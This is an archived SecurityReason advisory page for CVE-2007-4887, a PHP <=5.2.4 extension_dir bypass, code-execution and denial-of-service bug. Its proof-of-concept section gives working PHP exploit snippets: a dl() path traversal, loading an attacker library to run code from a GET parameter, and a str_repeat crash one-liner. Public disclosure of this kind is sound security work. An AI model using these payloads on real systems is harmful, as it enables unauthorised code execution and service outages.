Register | Forget Password | Login
Search :
SecurityReason

News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research

RSS

News

SecurityAlert

ExploitAlert

Apache

PHP

Corporate

Contact

About us

Services

SecurePHP

Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Details : SecurityAlert

  Topic : PHP <=5.2.4 extension_dir bypass & code exec & denial of service - windows version
  SecurityAlert : 3133
  CVE : CVE-2007-4887
  SecurityRisk : Medium  alert
  Remote Exploit : No
  Local Exploit : Yes
  Exploit Given : Yes
  Credit : laurent gaffie
  Date : 14.09.2007

  Affected Software : PHP <=5.2.4


  Advisory Text :  

Application: PHP <=5.2.4
Web Site: http://php.net
Platform: unix & windows /* replace .so --> dll . */
Bug: extension_dir bypass & code exec & denial of
service/*some people call this as a buffer overflow , but it's a
denial of service.*/
special condition: default php-memory-limit
-------------------------------------------------------

1) Introduction
2) Bug
3) Proof of concept
4) Greets
5) Credits
===========
1) Introduction
===========

"PHP is a widely-used general-purpose scripting language
that
is especially suited for Web development and can be embedded into
HTML."

======
2) Bug
======

extension_dir bypass & code exec & denial of service
http://ca.php.net/manual/fr/function.dl.php
=====
3)Proof of concept
=====
/*
debian:~# php -v
PHP 5.2.4 (cli) (built: Aug 31 2007 16:39:15)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
*/

Proof of concept example :
/*enable by default in php.ini for php 5.2.x */

<?php
dl("../../../../../../../../../../../../../../etc/passwd&quo
t;)
output --->
Warning: dl() [function.dl]: Unable to load dynamic library
'./../../../../../../../../../etc/passwd' -
./../../../../../../../../../etc/passwd: invalid ELF header in
/usr/local/apache2/htdocs/3.php on line 2

ya right ... /etc/passwd dont have any ELF header .
but we agree that it's not checked in anyway by open_basedir.
fine then bypassed .
then :
<?php
dl("./../../../../../../../../../../../home/myuser/www//my_p
owning_lib/p
wned.so");
$a = powningfunction($_GET['lets_exec_for_fun']);
print_r($a);
?>

denial of service :
debian:/home/mwoa# php
-r'dl(str_repeat("0",27999991));'
Erreur de segmentation
debian:/home/lorenzo#

========
4)Greets
========
Ivanlef0u,Deimos,Benji,Berga,Soh,and everyones from worldnet:
#futurezone & #nibbles

=====
5)Credits
=====

laurent gaffié
laurent.gaffié@gmail.com
secorizon coming soon !



Alert

*BSD libc (strfmon) Multiple vulnerabilities

high- 2008-03-25

Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems.

Apache rss

» Apache-SSL memory
   disclosure

» Apache mod_negotiation
   Xss and Http Response
   Splitting

» Apache (mod_status)
   Refresh Header - Open
   Redirector (XSS)

» Apache (mod_proxy_ftp)
   Undefined Charset UTF-7
   XSS Vulnerability

PHP rss

» PHP 5.2.5 and prior :
   *printf() functions
   Integer Overflow

» PHP 5.2.5 cURL safe_mode
   bypass

» PHP 5.2.4
   mail.force_extra_paramete
   rs unsecure

» PHP <= 5.2.5
   stream_wrapper_register()
   Denial of service

Copyright © SecurityReason. All Rights Reserved.